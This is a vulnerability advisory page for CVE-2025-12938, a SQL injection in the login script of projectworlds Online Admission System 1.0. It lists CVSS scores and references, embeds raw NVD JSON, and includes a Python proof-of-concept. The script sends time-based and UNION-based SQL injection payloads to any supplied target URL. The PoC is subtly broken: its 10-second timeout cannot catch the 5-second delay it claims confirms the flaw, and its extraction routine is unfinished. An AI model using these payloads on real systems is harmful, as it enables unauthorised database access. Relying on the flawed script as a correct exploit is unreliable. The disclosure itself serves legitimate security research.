CVE-2025-12938

Description

A vulnerability was identified in projectworlds Online Admission System 1.0. Affected by this vulnerability is an unknown functionality of the file /process_login.php. The manipulation of the argument keywords leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:projectworlds:online_admission_system:1.0:*:*:*:*:*:*:* - VULNERABLE

projectworlds Online Admission System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12938 PoC - SQL Injection in projectworlds Online Admission System 1.0
# Target: /process_login.php keywords parameter

def exploit_sql_injection(target_url):
    """
    SQL Injection PoC for CVE-2025-12938
    This PoC demonstrates a time-based blind SQL injection vulnerability
    """
    
    # Target endpoint
    endpoint = f"{target_url}/process_login.php"
    
    # Payload for time-based blind SQL injection
    # This payload causes a 5-second delay if vulnerable
    payload = {
        'keywords': "' OR SLEEP(5)-- -",
        'submit': 'Search'
    }
    
    print(f"[*] Testing target: {endpoint}")
    print(f"[*] Payload: {payload['keywords']}")
    
    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        print(f"[+] Response status: {response.status_code}")
        print(f"[+] Response length: {len(response.text)}")
        
        # Check for SQL error messages in response
        if 'mysql' in response.text.lower() or 'sql' in response.text.lower():
            print("[!] Potential SQL error detected in response")
            
    except requests.exceptions.Timeout:
        print("[+] Time-based blind SQL injection confirmed!")
        print("[+] Server responded after 5 seconds delay")
        return True
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

def extract_database_info(target_url):
    """
    Extract database information using UNION-based injection
    """
    
    # UNION-based SQL injection payload to extract database name
    payload = {
        'keywords': "' UNION SELECT 1,database(),3,4,5-- -",
        'submit': 'Search'
    }
    
    endpoint = f"{target_url}/process_login.php"
    
    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        # Parse response to extract database name
        print("[*] Extracting database information...")
        # Additional parsing logic would be needed here
    except Exception as e:
        print(f"[-] Error: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sql_injection(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12938
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12938
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12938/
[4] VulDB https://vuldb.com/cve/CVE-2025-12938
[5] https://github.com/juzidddd/CVE/issues/1
[6] https://vuldb.com/?ctiid.331662
[7] https://vuldb.com/?id.331662
[8] https://vuldb.com/?submit.682313

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12938", "sourceIdentifier": "[email protected]", "published": "2025-11-10T12:15:47.020", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in projectworlds Online Admission System 1.0. Affected by this vulnerability is an unknown functionality of the file /process_login.php. The manipulation of the argument keywords leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectworlds:online_admission_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2454BEDC-553B-4192-A2AE-48CEEA8B71E8"}]}]}], "references": [{"url": "https://github.com/juzidddd/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.331662", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.331662", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.682313", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}